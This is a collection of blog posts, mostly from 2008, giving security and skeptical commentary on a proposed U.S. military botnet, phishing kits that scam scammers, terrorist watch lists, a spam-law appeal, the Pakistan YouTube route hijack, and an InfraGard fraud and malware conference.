Col. Williamson, seeing that miscreants are using compromised machines all over the Internet to create botnets used for malicious purposes, has decided that the military needs to create its own, legitimate botnet. He proposes that this would be used in order to respond to online attacks from foreign countries by attacking the attackers, including both government and civilian attacking machines as necessary. He specifically proposes not using compromised machines (which would be illegal), but using machines on the af.mil (U.S. Air Force) network, including all hosts on the NIPRNet (Nonsecret IP Network).

The proposal doesn't really make any sense to me.

First of all, attacks from hostile compromised machines on the Internet occur on a daily basis and are already handled by network service providers. These attacks are never likely to be initiated specifically from an individual attacking country's systems, but rather from compromised systems all over the world--sometimes including compromised systems belonging to the U.S. military. Second, the best way to respond to attacking systems is not by launching hostile traffic back at them, but by filtering them or nullrouting them. Again, network service providers already do this today, and cooperate with each other in addressing major attacks. Thirdly, if the U.S. military sets up a botnet and uses it to launch denial of service attacks, it will be in violation of its own contracts with its network service providers--I don't know of any network service provider that offers a military exception to its terms of service regarding denial of service attacks. Fourth, if all of the U.S. military bots are on its own network, their aggregate bandwidth still can't exceed the bandwidth of its connections to other networks. Fifth, if there are attacks coming from another country that the U.S. is at war with, the recent subsea cable outages in the Middle East suggest that there are other effective mechanisms for disabling their ability to engage in Internet attacks.

Finally, it's not clear to me what benefit would be obtained from the military setting up its own botnet on its own network using its own IPs. Botnets offer two main benefits--(1) offering a distributed platform for computing and traffic generation and (2) creating a buffer of separation between the agent performing an action and the action itself. The second benefit occurs because the miscreant doesn't own the machines that make up the botnet, lots of other people do. A botnet composed entirely of hosts on the military's network is relatively easy to identify, filter, and block--the second benefit doesn't exist. The first benefit is also mostly lost if you use your own network and hosts. The point of a distributed denial of service attack is to use up the other guy's bandwidth, but not your own. That's very easy to do if you're not using your own resources, which is why distributed denial of service attacks use compromised systems and, sometimes, methods to amplify attacks using other people's servers that send out responses that are larger than the requests that prompt them. But if you're using your own resources on your own networks, you're limited to the bandwidth you have at your network interconnection points, and multiplying hosts inside that perimeter gains you nothing except a guarantee that you can saturate your own internetwork connectivity and cut yourself off from the outside unless your target has less bandwidth than you do. It's ironic that Williamson complains about a "fortress mentality," while making a proposal to create a gigantic bot army inside the military's own perimeter. A million-man army doesn't help you if they're inside a fortress with exits that restrict its ability to be deployed, except when you can win the battle with the number of men who can leave the exits at any one time.

I've also posted a comment on the Armed Forces Journal article at the AFJ's forum where I make a few additional points. I also agree with many of the other critical remarks that have been made in the thread there. "Crass Spektakel"'s point that "Whoever controls BGP and the backbone routers controls the internet" and that most of the control of BGP routing and the routing registries resides in the U.S. is a good one. A similar point could be made about DNS.

Other posts on this subject:

Kevin Poulsen at the Wired blog
Jon Stokes at Ars Technica

UPDATE (May 14, 2008): I may take some heat for even suggesting this, but an idea which actually takes advantage of both of the characteristic benefits of botnets I listed above and would be far, far more effective than Williamson's proposal would be if the military produced bot software along the lines of SETI@Home and Folding@Home, which anyone could volunteer to download and run on their home or corporate machines (or better still, made available to run on XBoxes and Play Station 3s), for use by the military when needed. Some of the abuse worries could be defeated if the activation and deactivation of the software was fully under the control of the end user, and the military obtained appropriate permission from upstream ISPs for activities which would otherwise constitute AUP violations by end users.

I hasten to add that this is still a terrible idea--putting such software out in public makes it a certainty that it would be reverse-engineered, and the probability of it being compromised by third parties for their own abuses would correspondingly increase.

UPDATE: Looks like Paul Raven beat me to the "Milnet@Home" idea, as he dubs it. A commenter at Bruce Schneier's blog also came up with the same idea.

F-Secure's blog also offers some good criticisms of Williamson's proposal.

Scammers scamming scammers

Marco Cova looks in some detail at the contents of some phishing scam kits targeting particular banks that were released to the public recently. These sorts of kits, containing web code, are ordinarily sold to scammers, but these were given away free. It wasn't out of generosity, but part of a larger scam--the code was written using a variety of obfuscation techniques so that the unwary script kiddie who modifies it to send the captured information to their own email address will not receive it. Instead, that information is sent to various email addresses presumably controlled by the distributor of the scammer-scamming phishing kits.

Software awards scam

Andy Brice decided to test various download sites to see which ones would give awards (and expect a banner to be posted by the developer's website with a link back) to a piece of "software" that consisted only of a text file named "awardmestars" containing the words "this program does nothing at all" repeated several times. He submitted it to 1033 sites, of which 218 sites listed it and 421 rejected it. Of those that accepted it, 11% gave it an award (he's currently at 23 awards):

The truth is that many download sites are just electronic dung heaps, using fake awards, dubious SEO and content misappropriated from PAD files in a pathetic attempt to make a few dollars from Google Adwords. Hopefully these bottom-feeders will be put out of business by the continually improving search engines, leaving only the better sites.

He notes the following sites which wrote him to say to stop wasting their time, indicating that they actually check submissions:

www.filecart.com

www.freshmeat.net

www.download-tipp.de (German)

The author wonders whether download sites that certify software as "100% clean" actually scan submitted software for malware, but says to test it would be unethical. Actually, something very much like his test could be done, using the EICAR antivirus test file instead of his text file.

(Via Dave Palmer on the SKEPTIC list.)

Ex-terrorists turned Christian evangelists

It was only a matter of time. Where John Todd, Mike Warnke, "Lauren Stratford," and others found that they could get attention and money by claiming to be ex-Satanists/witches/Illuminati converted to Christian evangelists, we now see "ex-Islamic terrorists" turned born-again Christians and hitting the lecture circuit, and getting paid for appearances at the U.S. Air Force Academy, as the New York Times reports. The Times article ends with the most obvious question:

Arab-American civil rights organizations question why, at a time when the United States government has vigorously moved to jail or at least deport anyone with a known terrorist connection, the three men, if they are telling the truth, are allowed to circulate freely. A spokesman for the F.B.I. said there were no warrants for their arrest.

Of the three speakers, Zak Anani, Kamal Saleem, and Walid Shoebat, Anani is described as the most explicitly preaching born-again Christianity rather than providing information about Islamic terrorism. He also seems to be the one with the clearest record of making false claims about his own background:

Anani, now an evangelical Christian, claims to be an expert on the topic because he killed 223 people in Allah's name, "two-thirds of them by daggers." He even claims to have killed a man for waking him up at 3 a.m. to pray.

Anani, born in Lebanon, said he joined a militant Muslim group in the early 1970s at age 13, and made his first kill shortly after.
...

He said he was soon promoted to troop leader and formed his own regiment, but later met a Christian missionary and converted.

Anani said he was persecuted for his conversion -- even his dad hired assassins to kill him.

He said he was soon promoted to troop leader and formed his own regiment, but later met a Christian missionary and converted.

Anani said he was persecuted for his conversion -- even his dad hired assassins to kill him -- and he was technically dead for seven minutes after narrowly escaping a beheading. He fled to the West and moved to Windsor about 10 years ago. His wife and three daughters joined him three years later.

Even in Canada, Anani said he's been physically attacked, and his house and car have been burned in Windsor for speaking out against Islam.

...

Staff. Sgt. Ed McNorton said Windsor police don't have a record of physical attacks against Anani, and his house wasn't burned.

McNorton said someone did torch his car, but it wasn't for the reasons Anani has claimed.

"There is nothing in the report we have to indicate it was in retaliation to his religious beliefs," said McNorton.

Anani's bio also states he lectured at Princeton University. Cass Cliatt, Princeton's media relations manager, said that never happened. She said Anani was scheduled to lecture there in late 2005 with the Walid Shoebat Foundation. But the event was cancelled and the foundation held a news conference at a nearby hotel.

Anani has refused several requests from The Star to revisit his past in detail.

Following a sermon Thursday night from Campbell Baptist Church Pastor Donald McKay -- Anani was scheduled to speak but his lecture was cancelled -- he again refused to answer questions.

...

Anani has said he's 49 years old, which would mean he was born in 1957 or 1958, said Quiggin. If he joined his first militant group when he was 13, it would have been in 1970 or 1971. But the fighting in Lebanon did not begin in earnest until 1975, Quiggin said.

"His story of having made kills shortly after he joined and having made 223 kills overall is preposterous, given the lack of fighting during most of the time period he claims to have been a fighter," Quiggin said. "He also states he left Lebanon to go to Al-Azhar University at the age of 18, which would mean he went to Egypt in 1976. In other words, according to himself, he left Lebanon within a year of when the fighting actually started."

He also pointed to a story on WorldNetDaily in which Walid Shoebat, another ex-terrorist and friend of Anani, also claims to have killed 223 people, two-thirds of them with daggers.

"What a coincidence," Quiggin said.

Quiggin said Anani's description of himself as a Muslim terrorist also "defies logic" based on the time frame.

"Most the groups involved in the fighting in Lebanon were secular and tended to be extreme leftists or Marxists," he said.

Quiggin said religious-based terrorism as part of the warring in Lebanon didn't begin until after 1979, following the revolution in Iran, the Soviet attack on Afghanistan and the attack on the Grand Mosque in Mecca by Sunni Muslim extremists.

Anani's claim to have survived a beheading attempt is also questionable, said Quiggin.

Jon Trott and Mike Hertenstein, can you take a look at these guys?

(Hat tip to Jeffrey Shallit.)

Most antiterrorism spending is wasteful

The March 6, 2008 issue of The Economist features lots of interesting articles (it includes one of the quarterly technology reviews), one of which is "Feel safer now?" This is a report on a study by economists in Texas and Alabama commissioned by the Copenhagen Consensus, which looks at the effects of increased spending on counterterrorism efforts and "homeland security" globally since 2001, and the effects. They calculate that while such spending has increased by somewhere between $65 billion and $200 billion a year, the benefits are far smaller than the costs of terrorism, which were about $17 billion in 2005. While the spending may have prevented some incidents, even if this extra spending prevented 30 attacks like the July 2005 London bombings every year, it would still be more expensive than the damage from terrorism. The authors suggest that the benefits from increased counterterrorism spending have been about 5-8 cents per each dollar of spending, whereas if instead money was spent specifically on disrupting terrorist finances, $5-$15 of benefits could be obtained for each dollar spent.

Terrorist watch list grows past 700,000 names

The ACLU reports that the Terrorist Screening Center's watch list reached 700,000 names in September 2007, and is adding 20,000 new names per month. "At that rate, our list will have a million names on it by July. If there were really that many terrorists running around, we'd all be dead."

Names on the list include:

Robert Johnson
Alexandra Hay
Evo Morales (president of Bolivia)
Saddam Hussein (dead former dictator of Iraq)
the 9/11 hijackers (all still dead)
Gary Smith
John Williams
Edward Kennedy (Massachusetts Senator)
John Lewis (U.S. Rep. from Georgia)
Daniel Brown (U.S. soldier detained on way home from Iraq)
James Moore (author of book critical of Bush administration)
Catherine ("Cat") Stevens (wife of Sen. Ted Stevens)
Yusuf Islam (formerly known as Cat Stevens)
Vernon Lewis (retired Major General, U.S. Army)
Robert Campbell (U.S. Navy, retired)
David Nelson
John William Anderson
Don Young (U.S. Rep. from Alaska)

The whole idea of checking names for flight screening is nearly pointless, since terrorists are capable of getting fake ID. It's absolutely idiotic to have extremely common names on the list and subject everyone who happens to have a common name to extra screening every time they fly. The right way to do screening is to use mechanisms like randomly subjecting people to extra screening and to have people undercover trained to identify suspicious behavior in the terminal--and to use multiple mechanisms that are randomly changed from day to day, so that security measures tested on one day will not be the exact measures in place on a later day.

UPDATE (March 18, 2008): Note that the no-fly list is a subset of the terrorist watch list. The former is what I criticize in the last paragraph. An FBI audit has stated that the information the FBI supplies for the terrorist watch list is "outdated and inaccurate."

Homeland Security threat

The Miami Herald has uncovered a new Homeland Security threat--and it's U.S. Customs and Border Protection agents that are committing crimes. Bribery, drug trafficking, migrant smuggling, embezzlement, and other crimes have become so prevalent that a senior manager has issued a memo pointing out that agents are supposed to uphold, not break the law:

U.S. Customs and Border Protection is supposed to stop these types of crimes. Instead, so many of its officers have been charged with committing those crimes themselves that their boss in Washington recently issued an alert about the ''disturbing events'' and the ``increase in the number of employee arrests.''

Thomas S. Winkowski, assistant commissioner of field operations, wrote a memo to more than 20,000 officers nationwide noting that employees must behave professionally at all times -- even when not on the job.

''It is our responsibility to uphold the laws, not break the law,'' Winkowski wrote in the Nov. 16 memo obtained by The Miami Herald.

(Hat tip to Dave Palmer on the SKEPTIC list.)

NSA's data mining and eavesdropping described

The March 10 Wall Street Journal contains a fairly detailed description of the data mining operation being run by the NSA. The program described is more data mining than eavesdropping, though it does involve the collection of transactional data like call detail records for telephone calls, and intercepted Internet data like web search terms and email senders and recipients. Also included is financial transaction data and airline data. I think most of this had already been pieced together, but this is a fairly comprehensive summary in one place. The WSJ story reports that leads generated from the data mining effort are then fed into the Terrorist Surveillance Program, which does warrantless eavesdropping. (An earlier version of this post incorrectly referred to the whole operation as the Terrorist Surveillance Program.)

Jeremy Jaynes loses appeal on spamming case

Jeremy Jaynes, the spammer who was convicted and sentenced to nine years in prison in 2003 for violating Virginia's anti-spam law, has lost his appeal before the Virginia Supreme Court in a 4-3 ruling. Several of the dissents claimed that Virginia's anti-spam law, which criminalizes unsolicited bulk email with falsified headers, even if it is political or religious in content rather than commercial, is a violation of the First Amendment. The quotations from Justice Elizabeth Lacy and Jaynes' attorney Thomas M. Wolf both state that the law has diminished everyone's freedom by criminalizing "bulk anonymous email, even for the purpose of petitioning the government or promoting religion."

Both Lacy and Wolf misrepresent the law, which makes it a crime to "Falsify or forge electronic mail transmission information or other routing information in any manner in connection with the transmission of unsolicited bulk electronic mail through or into the computer network of an electronic mail service provider or its subscribers."

There is a difference between forging headers and sending anonymous email--the latter does not require the former, and the latter is not prohibited by the law. Jaynes wasn't just trying to be anonymous--he was engaged in fraud, and falsifying message headers and from addresses to try to avoid the consequences of his criminality. He wasn't using anonymous remailers to express a political or religious message, and if he had been, he wouldn't have been able to be charged under this law.

UPDATE (September 12, 2008): The Virginia Supreme Court has reversed itself and struck down Virginia's anti-spam law as unconstitutional, on the grounds that prohibiting false routing information on emails infringes upon the right to anonymous political or religious speech. This is a very bad decision for the reasons I gave above. There are ways to engage in anonymous speech without doing what Jaynes did, falsifying message headers and domain names. The court's argument that one must falsify headers, IP addresses, and domain names in order to be anonymous is factually incorrect. Anonymity doesn't require header falsification, it only requires *omission* of identifying information.

Pakistan takes out YouTube, gets taken out in return

As ZDNet reports, yesterday afternoon, in response to a government order to filter YouTube (AS 36561), Pakistan Telecom (AS 17557, pie.net.pk) announced a more-specific route (/24; YouTube announces a /23) for YouTube's IP space, causing YouTube's Internet traffic to go to Pakistan Telecom. YouTube then re-announced its own IP space in yet more-specific blocks (/25), which restored service to those willing to accept routing announcements for blocks that small. Then Pakistan Telecom's upstream provider, PCCW (AS 3491), which had made the mistake of accepting the Pakistan Telecom /24 announcement for YouTube in the first place, shut off Pakistan Telecom completely, restoring YouTube service to the world minus Pakistan Telecom. They got what they wanted, but not quite in the manner they intended.

Don't mess with the Internet.

Martin Brown gives more detail at the Renesys Blog, including a comment on how this incident shows that it's still a bit too easy for a small ISP to disrupt service by hijacking IPs, intentionally or inadvertently. Danny McPherson makes the same point at the Arbor Networks blog, and also gives a good explanation of how the Pakistan Internet provider screwed up what they were trying to do.

Somebody still needs to update the Wikipedia page on how Pakistan censors the Internet to cover this incident.

UPDATE: BoingBoing reports that the video which prompted this censorship order was an excerpt from Dutch Member of Parliament Geert Wilders' film "Forbidden" criticizing Islam, which was uploaded to YouTube back on January 28. I've added "religion" and "Islam" as labels on this post, accordingly. The two specific videos mentioned by Reporters without Borders as prompting the ban have been removed from YouTube, one due to "terms of use violation" and one "removed by user." The first of these two videos was supposedly the Geert Wilders one; the second was of voters describing election fraud during the February 18 Parliamentary elections in Pakistan. This blog suggests that the latter video was the real source of the attempted censorship gone awry, though the Pakistan media says it was the former. So perhaps the former was the pretext, and the latter was the political motivator.

A "trailer" for Wilders' film is on YouTube here. Wilders speaks about his film on YouTube here and here. Ayaan Hirsi Ali defends Wilders on Laura Ingraham's show on Fox News here. (Contrary to the blog post I've linked to, Hirsi Ali was not in the Theo Van Gogh film "Submission Part One," which can itself be found here, rather, she wrote it. Van Gogh was murdered as a result of it. The beginning and end is in Arabic with Dutch subtitles, but most of it is in English with Dutch subtitles.)

UPDATE (February 26, 2008): This just in, from Reuters--Pakistan "might have been" the cause of the YouTube outage. Way to be on the ball with breaking news, Reuters!

The Onion weighs in on the controversy!

New Mexico InfraGard conference

On Friday, I attended the New Mexico InfraGard Member Alliance's "$-Gard 2008" conference in Albuquerque. It was an excellent one-day conference that should be used as a model by other chapters. The conference was open to the public, and featured an informative and entertaining two-hour seminar on fraud and white collar crimes by Frank Abagnale, author of the autobiographical Catch Me If You Can and anti-fraud books The Art of the Steal and Stealing Your Identity. (Another version of Abagnale's talk can be viewed as an online webinar courtesy of City National Bank.) Abagnale argued that fraud has become much easier today than it was when he was a criminal forger, with numerous examples, and also offered some simple and relatively inexpensive ways for businesses and individuals to protect themselves. For example, he recommended the use of microcut shredders, and observed that his own business keeps shredders near every printer, and no documents get thrown away, everything gets shredded. He recommended the use of a credit monitoring service like Privacy Guard, and that if you write checks, you use a black uniball 207 gel pen, which is resistant to check-washing chemicals. For businesses that accept cash, he recommended training employees in some of the security features of U.S. currency rather than relying on pH testing pens, which are essentially worthless at detecting counterfeit money. By recognizing where bills use optical variable ink, for example, you can easily test for its presence in the time it takes you to accept bills from a customer and transfer them into a cash register. He also recommended that businesses use bank Positive Pay services to avoid having business checks altered. Other speakers included Anthony Clark and Danny Quist of Offensive Computing, who gave a talk on "Malware Secrets," based on their research and collection of 275,000 malware samples. Their talk included an overview of the economics of malware, which I believe is essential for understanding how best to combat it. They looked at the underground economy fairly narrowly focused on malware itself, and the cycle of its production, use, reverse engineering by whitehats, the development of antivirus patterns, and then demand for new undetectible malware, and observed that in that particular cycle it's probably the legitimate security companies such as antivirus and IDS vendors who make the most money. They didn't really look at the broader features of the underground economy, such as how botnets are used as infrastructure for criminal enterprises, or the division of criminal labor into different roles to disperse risk, though they certainly mentioned the use of compromised machines for spamming and phishing attacks. They skipped over some of the technical details of their work on automating the unpacking and decryption of malware, which was probably appropriate given the mixed levels of technical background in this audience. A particularly noteworthy feature of their research was their list of features of antivirus software that should be examined when making a purchase decision--performance, detection rates, miss rates, false positive rates, system intrusiveness, a product's own security, ease of mass deployment, speed, update frequency, use of signatures vs. other detection methods, ability to clean, capabilities with various categories of malware (rootkits, trojans, worms, backdoors, spyware), and ability to detect in real time vs. during a scan. Alex Quintana of Sandia National Labs also spoke about current trends in malware, in the most frightening talk of the conference. He talked about how malware has gone from something that attacks exposed servers on the Internet to something that individual clients pull to their machines from the Internet, usually via drive-by downloads. He demonstrated real examples of malware attacks via web pages and via Shockwave Flash, PowerPoint, and Word documents, and explained how one of his colleagues has coined the word "snares" for emails or web pages that lure individuals into targeted drive-by malware downloads. There was a wealth of interesting detail in his presentation, about trojans that use covert tunnels and hiding techniques, injecting themselves into other running processes, using alternate data streams, and obfuscated information in HTTP headers and on web pages. One trojan he described rides on removable media such as USB thumbdrives and runs when inserted into a PC thanks to Windows Autorun; it drops one component that phones home to accept instructions from a command and control server, and another that causes the malware to be written out on any other removable device inserted into the machine. It's a return of the old-fashioned virus vector of moving from machine to machine via removable media rather than over the network. From law enforcement, there were presentations from Melissa McBee-Anderson of the Internet Crime Complaint Center (IC3, another public-private partnership, which acts as a clearinghouse for Internet crime complaints and makes referrals of complaints to appropriate federal, state, , local, and international law enforcement agencies) and from various agents of the Cyber Squad of the Albuquerque FBI office. These presentations were somewhat disappointing in that they demonstrated how huge the problem is, yet how few prosecutions occur. For example, after the 2004 tsunami disasters, there were over 700 fake online charities set up to prey on people's generosity after a disaster, yet only a single prosecution came of it. In 2005, the number of fake online charities for hurricanes Katrina and Rita was over 7,000, yet only five prosecutions came of those, including one in Albuquerque. Yet even that "successful" prosecution led to no jail time, only community service and probation. Frank Abagnale's presentation also included some woeful statistics about prosecutions for white collar crime and check fraud that explicitly made the same point that was implicit in several of the law enforcement presentations. To IC3's credit, however, the showed an example of a link chart generated from their crime complaint data, a very tiny portion of which was brought to them by a law enforcement agency seeking more information, the rest of which came from multiple received complaints. That link chart showed many interconnected events by five organized fraud gangs. Ms. McBee-Anderson also reported on successful international rosecutions against individuals at Lagos, Nigeria's "walking Wal-Mart," where people were selling goods purchased with stolen credit card information and using forged cashier's checks. (I'm still amazed that anyone actually falls for the Nigerian online fraud schemes, but they do.) The conference did a good job of making clear some specific threats and offering recommendations on necessary (yet unfortunately individually insufficient) defenses. It's quite clear that relying solely on law enforcement to provide you with a remedy after the fact is a bad idea. It's essential that private enterprises take preventative measures to protect themselves, and use a layered, defense-in-depth approach to do so.

UPDATE (23 October 2022): Note that Frank Abagnale's life story of con artistry turned out itself to be a con, as documented in Alan C. Logan's book, The Greatest Hoax on Earth: Catching Truth, While We Can (2020).